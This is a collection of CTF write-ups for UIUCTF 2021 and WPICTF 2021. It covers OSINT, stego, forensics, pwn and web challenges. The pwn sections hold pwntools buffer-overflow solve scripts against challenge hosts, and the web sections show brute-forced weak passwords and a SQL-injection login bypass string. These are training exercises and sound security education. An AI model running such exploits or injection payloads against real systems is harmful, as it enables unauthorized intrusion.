3 | title: The White Circle | Uiuctf 2021 | CEO Writeup
4 | desc: Check out our writeup for CEO for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: misc
9 | challenge: CEO
10 | tags: "misc, twh, aircrack"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 | - We have a `.cap` file in this challenge
19 | - its a handshake file which can be used with `aircrack-ng`
20 |
21 |
22 | aircrack-ng megacorp-01.cap -w /usr/share/wordlists/rockyou.txt
23 |
24 |
25 | 
26 |
27 |
28 |
29 | uiuctf{nanotechnology}
30 |
31 |
32 |
--------------------------------------------------------------------------------
/uiuctf_2021/misc/Emote.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Emote Writeup
4 | desc: Check out our writeup for Emote for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: misc
9 | challenge: Emote
10 | tags: "misc, starry"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : Starry-Lord
17 |
18 | Challenge mentions sharing images on discord, so I checked uiuctf 's discord and found a suspicious emoji:
19 |
20 |
21 | 
22 |
23 |
24 | Use zsteg on the png to read flag:
25 |
26 |
27 | uiuctf{staring_at_pixels_is_fun}
28 |
29 |
--------------------------------------------------------------------------------
/uiuctf_2021/misc/dootdoot.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | doot doot Writeup
4 | desc: Check out our writeup for doot doot for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: misc
9 | challenge: doot doot
10 | tags: "misc, twh"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 |
19 | - we are given a youtube video which is 8hrs 52mins long
20 | - bee movie script is looping
21 | - flag appears in the scrolling text at 9:55
22 | - https://youtu.be/zNXl9fqGX40?t=595
23 |
24 |
25 | 
26 |
27 |
28 | `uiuctf{doot_d0ot_do0t_arent_you_tired_of_the_int4rnet?}`
29 |
30 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare1.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 1 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 1 for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 1
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Charlie Chaplin has gotten into software development, coding, and the like... He made a company, but it recently came under fire for a PR disaster. He got **all over the internet** before he realized the company's mistake, and is now scrambling to clean up his mess, but it may be too late!! Find his Twitter Account and investigate! *NOTE THAT THESE CHALLENGES DO NOT HAVE DO BE DONE IN ORDER!”*
19 |
20 | search “Chaplin Chaplin Coding” on twitter and you will get one result
21 |
22 | https://twitter.com/ChaplinCoding
23 |
24 | Now go to the “view lists” under the three dots next to follow (You need an account to see it)
25 |
26 | You’ll find the flag in the second list
27 | https://twitter.com/i/lists/1416876734578929664
28 |
29 |
30 | Flag: uiuctf{pe@k_c0medy!}
31 |
32 |
33 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare2.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 2 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 2 for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 2
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Charlie made an advertisement to promote his company, he is using the modern media platform YouTube to present it! Can you find it?”
19 |
20 | Searching for “Charlie Chaplin Coding” on Google turns up this channel; the link is also given on the Twitter account from the previous challenge
21 |
22 | https://www.youtube.com/channel/UCxPyHVMa8TyKrOj05x86osA
23 |
24 | Open the only video on the channel; the flag appears near the end of the video
25 |
26 | 
27 |
28 |
29 |
30 | flag: uiuctf{ch@plin_oN_th3_tV!!}
31 |
32 |
33 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare3.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 3 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 3 for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 3
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Charlie even has a website!!! Find it and look around!
19 | The inner content of this flag begins with **"ch"**”
20 |
21 | Under the **youtube “about”** page from above you’ll get the link to their website
22 |
23 |
24 | https://www.charliechaplin.dev/home
25 |
26 |
27 | Scroll down on the home page and you’ll see an album of 3 pictures of Charlie.
28 | If you look closely at the picture of Charlie with a Macintosh, you’ll see the flag:
29 | https://lh4.googleusercontent.com/qa6GoXttPCeo63Stxl8lJUNzxXZQ-TEac2HGMLKDsd1h3pEoE6MvQCS1ZdZ-x41n2mP398ke75tKKAg1B5w6niI=w16383
30 |
31 |
32 | Flag: uiuctf{ch@pl1n_i5_eL337}
33 |
34 |
35 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare4.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 4 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 4 for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 4
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Charlie left another flag on his company's website. Maybe you have to reach out to him???
19 | The inner content of this flag begins with **"w3"”**
20 |
21 | under the **contact** page you’ll see a google form to fill
22 |
23 |
24 | https://docs.google.com/forms/d/e/1FAIpQLScpLDShOWwi3gQb12RfViHuVZR-__L5p8vIAQVQ6eczQULN3Q/viewform
25 |
26 |
27 | Just submit the form (can be empty) and you’ll get the flag
28 |
29 |
30 | Flag: uiuctf{w3_d0_nOt_v@lu3_yoUR_1nPuT}
31 |
32 |
33 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare5.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 5 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 5 for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 5
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Charlie also has an imgur account that may hold the secret to his PR nightmare... Can you find it?
19 | The inner content of this flag begins with **"tH"** ”
20 |
21 | Under the same website, Go to the **about us** page
22 | The last image there is actually uploaded from imgur
23 |
24 |
25 | https://imgur.com/a/iZI1ov4
26 |
27 |
28 | Go to their profile and check out their comment history
29 | Flag is in the first ever comment
30 |
31 |
32 | https://imgur.com/user/chaplindevelopment/comments
33 |
34 |
35 |
36 | Flag: uiuctf{tH3_pR_p0Lic3_h@vE_cAugHt_Up?!}
37 |
38 |
39 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare6.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 6 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 6 for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 6
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Wow Charlie even set up a linkedin account, but not well it is kind of a mess. Is the PR nightmare here??
19 | The inner content of this flag begins with **"pr"**”
20 | This time you should go to linkedin to search up their name.
21 |
22 | I searched up “C3D” as specified from their website to get their profile
23 |
24 | https://www.linkedin.com/groups/13984825/
25 |
26 | Go to the group owner’s page; his profile says “I ran a event called "**Top Hat Development Night**". It was very cool, you can find it on linkedin still search it up”
27 |
28 | Search up "**Top Hat Development Night**" under events and you’ll get the event and flag under it
29 |
30 | https://www.linkedin.com/events/6822753659445743616/
31 |
32 |
33 | Flag: uiuctf{pr0f3s5iOn@l_bUs1n3sS_envIroNm3n7}
34 |
35 |
36 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare7.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 7 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 7 for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 7
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Chaplin left some code up on GitHub which may be the actual PR nightmare I hope not though... Leaked code is bad. Find it!!!
19 | The inner content of this flag begins with **"th"**”
20 |
21 | This time search for “Charlie Chaplin” on GitHub; there should be only 4 results under Users,
22 | and the right profile is https://github.com/charliechaplindev
23 |
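24 | Scroll down their history and you’ll see an issue stating “ [SECRET KEY SECRET KEY THIS IS BAD THIS IS BAD](https://github.com/charliechaplindev/C3D-Official/issues/3)”. Click on that and you’ll get the flag. Secrets end up in issue trackers as well as in code, so the issue list is worth reading in any leak review.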
25 |
26 |
27 | Flag: uiuctf{th3_TrUe_pR_N1gHtm@r3}
28 |
29 |
30 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/OSINTTheCreator.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | OSINT The Creator Writeup
4 | desc: Check out our writeup for OSINT The Creator for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: OSINT The Creator
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “There is a flag on a few of the organizer's profiles. Find it!”
19 |
20 | One of the most prominent organisers is thomas.
21 | Search for his username on Discord in the uiuctf server and you’ll find the flag on his profile (it is in a spoiler)
22 |
23 |
24 | Flag: uiuctf{@b0uT_m3_suppOrT5_maRkD0wN}
25 |
26 |
27 |
--------------------------------------------------------------------------------
/uiuctf_2021/pwn.md:
--------------------------------------------------------------------------------
1 | # pwn
2 |
3 | ## pwn warmup
4 | > Solved by : thewhiteh4t
5 |
6 |
7 | #!/usr/bin/python3
8 | # Solve script for "pwn warmup": parse the hex address the service prints, then send it back behind fixed padding.
9 | from pwn import *
10 |
11 | host = 'pwn-warmup.chal.uiuc.tf'
12 | port = 1337
13 | offset = 20  # number of filler bytes sent ahead of the address
14 | addr = 0  # placeholder, replaced below by the value parsed from the banner
15 | # NOTE(review): a fixed 20-byte offset suggests the service reads input without a length check - the binary is not shown, confirm there
16 | junk = b'A' * offset
17 | # Connect and read the banner up to and including the first "ad\n"
18 | conn = remote(host, port)
19 | lines = conn.recvuntil('ad\n').decode().split('\n')
20 | addr = lines[2].split(' = ')[1].strip()  # expects the third received line to look like "<label> = <hex value>"
21 | addr = int(addr, 16)
22 | le_num = p64(addr)  # pack the integer into 8 bytes (little-endian unless pwntools' context says otherwise)
23 | buffer = junk + le_num  # presumably these 8 bytes land on a saved return address or function pointer - confirm against the binary
24 | conn.sendline(buffer)
25 | flag = conn.recvuntil('}').decode()  # read up to the closing brace of the flag
26 | print(flag)
27 |
28 |
29 |
30 | 
31 |
32 |
33 |
--------------------------------------------------------------------------------
/uiuctf_2021/pwn/pwnwarmup.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | pwn warmup Writeup
4 | desc: Check out our writeup for pwn warmup for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: pwn
9 | challenge: pwn warmup
10 | tags: "pwn, twh"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 |
19 | #!/usr/bin/python3
20 | # Solve script for "pwn warmup": parse the hex address the service prints, then send it back behind fixed padding.
21 | from pwn import *
22 |
23 | host = 'pwn-warmup.chal.uiuc.tf'
24 | port = 1337
25 | offset = 20  # number of filler bytes sent ahead of the address
26 | addr = 0  # placeholder, replaced below by the value parsed from the banner
27 | # NOTE(review): a fixed 20-byte offset suggests the service reads input without a length check - the binary is not shown, confirm there
28 | junk = b'A' * offset
29 | # Connect and read the banner up to and including the first "ad\n"
30 | conn = remote(host, port)
31 | lines = conn.recvuntil('ad\n').decode().split('\n')
32 | addr = lines[2].split(' = ')[1].strip()  # expects the third received line to look like "<label> = <hex value>"
33 | addr = int(addr, 16)
34 | le_num = p64(addr)  # pack the integer into 8 bytes (little-endian unless pwntools' context says otherwise)
35 | buffer = junk + le_num  # presumably these 8 bytes land on a saved return address or function pointer - confirm against the binary
36 | conn.sendline(buffer)
37 | flag = conn.recvuntil('}').decode()  # read up to the closing brace of the flag
38 | print(flag)
39 |
40 |
41 |
42 | 
43 |
44 |
45 |
--------------------------------------------------------------------------------
/wpictf_2021/README.md:
--------------------------------------------------------------------------------
1 | # WPICTF 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Forensics](forensics.md)
8 | * [Misc](misc.md)
9 | * [Web](web.md)
10 | * [Reverse Engineering](re.md)
11 | * [Pwn](pwn.md)
12 | * [Stego](stego.md)
--------------------------------------------------------------------------------
/wpictf_2021/forensics/Holmes.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Wpictf 2021 | Holmes Writeup
4 | desc: Check out our writeup for Holmes for Wpictf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Wpictf 2021
7 | parent: wpictf_2021
8 | category: forensics
9 | challenge: Holmes
10 | tags: "forensics, starry"
11 | date: 2021-04-26T00:00:00+00:00
12 | last_modified_at: 2021-04-26T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : Starry-Lord
18 |
19 | * the challenge gives us the following string
20 |
21 | ```
22 | Z29vZCB0aG91Z2h0LCBidXQgbm8u
23 | ```
24 |
25 | * it looks like base64, but the base64 decoder only shows the following:
26 |
27 | ```
28 | good thought, but no.
29 | ```
30 |
31 | * using the `Sherlock` OSINT tool with the string itself as the username, we found this GitHub repository:
32 |
33 | ```
34 | https://github.com/Z29vZCB0aG91Z2h0LCBidXQgbm8u/flag/blob/main/README.md
35 | ```
36 |
37 | ```
38 | WPI{sh3rlock_holmes_w0uld_be_pr0ud}
39 | ```
--------------------------------------------------------------------------------
/wpictf_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | WPICTF 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Wpictf 2021
7 | ---
--------------------------------------------------------------------------------
/wpictf_2021/pwn.md:
--------------------------------------------------------------------------------
1 | # pwn
2 |
3 | ## $m4$h
4 |
5 | > Solved by : thewhiteh4t
6 |
7 | ```python
8 | #!/usr/bin/env python3
9 | # Solve script for "$m4$h": send 11 filler bytes followed by a fixed 32-bit value, then print the reply.
10 | from pwn import *
11 |
12 | host = 'smash184384.wpictf.xyz'
13 | port = 15724
14 |
15 | junk = 'A' * 11  # filler bytes sent ahead of the 32-bit value
16 | num = 923992130  # 0x37130042
17 | # NOTE(review): presumably the value the target expects in a variable placed after an 11-byte buffer - the challenge source is not shown, confirm there
18 | le_num = p32(num, endianness='little')  # 4 bytes, least-significant byte first
19 | buffer = junk.encode() + le_num + '\n'.encode()  # payload = filler + packed value + newline
20 |
21 | conn = remote(host, port)
22 | conn.send(buffer)
23 | flag = conn.recvline().decode().split(': ')[1].strip()  # reply is expected as "<label>: <flag>"; keep the part after ': '
24 | print(f'\nFLAG : {flag}\n')
25 | conn.close()
26 | ```
--------------------------------------------------------------------------------
/wpictf_2021/pwn/m4h.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Wpictf 2021 | $m4$h Writeup
4 | desc: Check out our writeup for $m4$h for Wpictf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Wpictf 2021
7 | parent: wpictf_2021
8 | category: pwn
9 | challenge: $m4$h
10 | tags: "pwn, twh"
11 | date: 2021-04-26T00:00:00+00:00
12 | last_modified_at: 2021-04-26T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 | ```python
20 | #!/usr/bin/env python3
21 | # Solve script for "$m4$h": send 11 filler bytes followed by a fixed 32-bit value, then print the reply.
22 | from pwn import *
23 |
24 | host = 'smash184384.wpictf.xyz'
25 | port = 15724
26 |
27 | junk = 'A' * 11  # filler bytes sent ahead of the 32-bit value
28 | num = 923992130  # 0x37130042
29 | # NOTE(review): presumably the value the target expects in a variable placed after an 11-byte buffer - the challenge source is not shown, confirm there
30 | le_num = p32(num, endianness='little')  # 4 bytes, least-significant byte first
31 | buffer = junk.encode() + le_num + '\n'.encode()  # payload = filler + packed value + newline
32 |
33 | conn = remote(host, port)
34 | conn.send(buffer)
35 | flag = conn.recvline().decode().split(': ')[1].strip()  # reply is expected as "<label>: <flag>"; keep the part after ': '
36 | print(f'\nFLAG : {flag}\n')
37 | conn.close()
38 | ```
--------------------------------------------------------------------------------
/wpictf_2021/stego/Suspicioustraffic.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Wpictf 2021 | Suspicious traffic Writeup
4 | desc: Check out our writeup for Suspicious traffic for Wpictf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Wpictf 2021
7 | parent: wpictf_2021
8 | category: stego
9 | challenge: Suspicious traffic
10 | tags: "stegano, twh, pcap, tshark"
11 | date: 2021-04-26T00:00:00+00:00
12 | last_modified_at: 2021-04-26T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 | * we are given a pcapng file with some HTTP traffic
20 | * some of the requests have extra characters in data field
21 | * they can be listed using tshark easily
22 |
23 | ```bash
24 | tshark -r capture.pcapng -T fields -e http.file_data | grep "\S" | grep -v "html" | cut -d "\\" -f 1 | tr -d "\n" # print each packet's http.file_data, drop blank lines and lines containing "html", keep the text before the first backslash, join into one line
25 | ```
26 |
27 | ```
28 | WPI{su3p1ci0uS_htTp}
29 | ```
--------------------------------------------------------------------------------
/wpictf_2021/web/wpiadmin.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Wpictf 2021 | wpi admin Writeup
4 | desc: Check out our writeup for wpi admin for Wpictf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Wpictf 2021
7 | parent: wpictf_2021
8 | category: web
9 | challenge: wpi admin
10 | tags: "web, twh"
11 | date: 2021-04-26T00:00:00+00:00
12 | last_modified_at: 2021-04-26T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 | * email of our friend : alexo@uupeye.edu
20 | * “students” here have some “bad” passwords
21 | * emails of students are visible on : https://wpiadmin.wpictf.xyz/topStudents
22 | * so we get a list of emails which we can bruteforce on student login!
23 |
24 | ```
25 | colino@uupeye.edu
26 | calliep@uupeye.edu
27 | annar@uupeye.edu
28 | gaylenek@uupeye.edu
29 | dennisb@uupeye.edu
30 | sherrim@uupeye.edu
31 | adams@uupeye.edu
32 | ```
33 |
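34 | * after bruteforcing we get all these credentials; every password is one of the most common ones, so a common-password blocklist when passwords are set, plus login rate limiting or lockout, would have stopped this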
35 |
36 | ```
37 | colino@uupeye.edu:123456
38 | calliep@uupeye.edu:password
39 | annar@uupeye.edu:iloveyou
40 | gaylenek@uupeye.edu:qwerty
41 | dennisb@uupeye.edu:123123
42 | sherrim@uupeye.edu:12345678
43 | adams@uupeye.edu:soccer
44 | ```
45 |
46 | * after checking each profile we get flag on `dennisb@uupeye.edu`
47 |
48 | 
49 |
50 |
--------------------------------------------------------------------------------
/wpictf_2021/web/wpiadmin2.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Wpictf 2021 | wpi admin 2 Writeup
4 | desc: Check out our writeup for wpi admin 2 for Wpictf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Wpictf 2021
7 | parent: wpictf_2021
8 | category: web
9 | challenge: wpi admin 2
10 | tags: "web, twh, sql, sqli"
11 | date: 2021-04-26T00:00:00+00:00
12 | last_modified_at: 2021-04-26T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 | * we login as dennisb@uupeye.edu again
20 | * In student communication we get the link to admin portal : https://wpiadmin.wpictf.xyz/iyghfihGBKHJF9719fn113
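21 | * Bruteforcing did not work so I tried SQL login bypass using burpsuite; the input below closes the quoted email value and appends an always-true condition, which only works when the login query is built by concatenating user input (parameterized queries prevent it)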
22 |
23 | ```
24 | admin@uupeye.edu' or '1'='1
25 | ```
26 |
27 | 
28 |
29 | * Bypass is successful and we get the link for admin portal!
30 |
31 | 
32 |
33 |
--------------------------------------------------------------------------------